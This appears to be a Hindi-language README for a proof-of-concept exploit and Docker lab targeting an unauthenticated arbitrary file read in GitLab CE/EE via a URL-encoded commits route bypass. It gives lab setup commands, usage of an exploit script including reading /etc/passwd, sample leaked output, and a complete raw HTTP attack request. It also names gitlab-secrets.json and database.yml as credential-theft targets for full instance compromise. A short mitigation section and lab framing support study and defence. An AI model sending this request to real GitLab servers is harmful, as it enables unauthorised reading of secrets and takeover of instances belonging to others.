
CVE-2026-85706 के लिए PoC और Docker लैब, जो GitLab CE/EE में commits API रूट बायपास और urlencoded error channel के माध्यम से एक unauthenticated arbitrary file read है।
★ CVE-2026-85706 GitLab अनधिकृत मनमाना फ़ाइल पठन PoC ★
https://github.com/user-attachments/assets/026749ec-04e9-4dd5-9453-cb7c1f6e823d
CVE-2026-85706 GitLab CE/EE में एक अनधिकृत मनमाना फ़ाइल पठन है (CVSS 10.0, CISA KEV), जो
POST /api/v4/projects/:id/repository/commitsके माध्यम से होता है, जिसका body-upload helperauthenticate!से पहले चलता है औरparams['file.path']को बिना किसी confinement के एक absolute path के रूप में पढ़ता है।commitsके एक अक्षर को URL-encode करने पर →%63ommitsGitLab-Workhorse को route miss करा देता है (इसलिए यह कभीfile.pathको overwrite नहीं करता), जबकि Rails अभी भी%63 → cdecode करके handler तक route करता है — जिससे हमलावर query string के माध्यम सेfile.pathसेट कर सकता है।Content-Type=application/x-www-form-urlencodedके साथ, helper फ़ाइल सामग्री को फिर से parse करता है और दो hex digits के बाद न आने वाला%उस सामग्री को400body में reflect करता है (जिन फ़ाइलों में यह नहीं होता उनके लिए केवल401read oracle मिलता है)। कम से कम एक public project आवश्यक है।
| श्रेणी | संस्करण |
|---|---|
| संवेदनशील | GitLab CE/EE 18.7 – 19.1.7, 19.2.0 – 19.2.5, 19.3.0 – 19.3.1 |
| पैच किया गया | 19.1.8 / 19.2.6 / 19.3.2 या बाद का (2026-09-10) |
% होता है (application logs, और configs/credentials जिनमें URL-encoded मान होते हैं) → recon + credential theft → authenticated access / पूर्ण instance compromise तक chaininggitlab-secrets.json, database.yml) तक पहुँचता है; ध्यान दें कि विशुद्ध रूप से hex/base64 फ़ाइलें public % reflection channel के माध्यम से केवल एक existence oracle लौटाती हैं (echo trigger करने के लिए कोई अमान्य % byte नहीं)authenticate! जोड़ता है, इसलिए file-read sink से पहले एक अनधिकृत request को अस्वीकार कर दिया जाता हैसंवेदनशील GitLab CE को build और run करें। boot पर, seeder /flag.txt (एक trailing
% leak trigger के साथ) रखता है और एक public project victim/public-app (project id 1) बनाता है ताकि
commits API अनधिकृत रूप से पहुँच योग्य हो। पहला boot ~2–3 मिनट लेता है।
docker build -t cve-2026-85706 .
docker run -d --name cve-2026-85706 --shm-size 256m -p 8088:80 cve-2026-85706
# wait until the seeder reports it is ready
docker exec cve-2026-85706 tail -n 20 /var/log/seed.log # look for: [seed] SEED_DONE ...
flag एक placeholder है (EQST{gitlab_cve_2026_85706_arbitrary_file_read})। image को edit किए बिना
run time पर अपना सेट करें: docker run -e FLAG='YOUR_FLAG' ... cve-2026-85706।
| पूर्व शर्त | इस lab में स्थिति |
|---|---|
| GitLab 18.7 – 19.1.7 | 19.1.7-ce.0 |
| कम से कम एक public project (anon commits API तक पहुँचता है) | victim/public-app (id 1), स्वतः निर्मित |
/api/v4/projects/:id/repository/commits अनधिकृत रूप से पहुँच योग्य | exposed |
| सर्वर filesystem पर flag | /flag.txt (trailing % reflection trigger) |
exploit gitlab_exploit.py एक single unauthenticated
request के साथ सर्वर से एक फ़ाइल पढ़ता है, %63ommits Workhorse route bypass और urlencoded re-parse error channel का उपयोग करते हुए।
--read के साथ फ़ाइल चुनें (default /flag.txt)।
# default: read /flag.txt and print the flag
python3 gitlab_exploit.py 172.17.0.2
# read any absolute path (content disclosed only if it contains an invalid '%')
python3 gitlab_exploit.py 172.17.0.2 --read /etc/passwd
# just confirm the sink is reachable
python3 gitlab_exploit.py 172.17.0.2 --check
[*] target http://172.17.0.2
[*] endpoint /api/v4/projects/1/repository/%63ommits
[*] file.path /flag.txt
[+] arbitrary file read OK -> content of /flag.txt:
EQST{gitlab_cve_2026_85706_arbitrary_file_read}%
[+] FLAG: EQST{gitlab_cve_2026_85706_arbitrary_file_read}
विकल्प:
--read "<abs path>" — पढ़ने के लिए absolute file path (default /flag.txt)--project <id> — अनधिकृत रूप से पहुँच योग्य public project id (default 1)--check — केवल पुष्टि करें कि file-read sink पहुँच योग्य है (local file not present की अपेक्षा करता है)Raw request (Burp Repeater के लिए):
POST /api/v4/projects/1/repository/%63ommits?file=&file.path=/flag.txt&file.size=1&Content-Type=application/x-www-form-urlencoded HTTP/1.1
Host: 172.17.0.2
Content-Length: 0
Connection: close
*/repository/commits* और */repository/files* के लिए POST/PUT को block करें, और instance को SSO / VPN / IP allowlist के पीछे रखें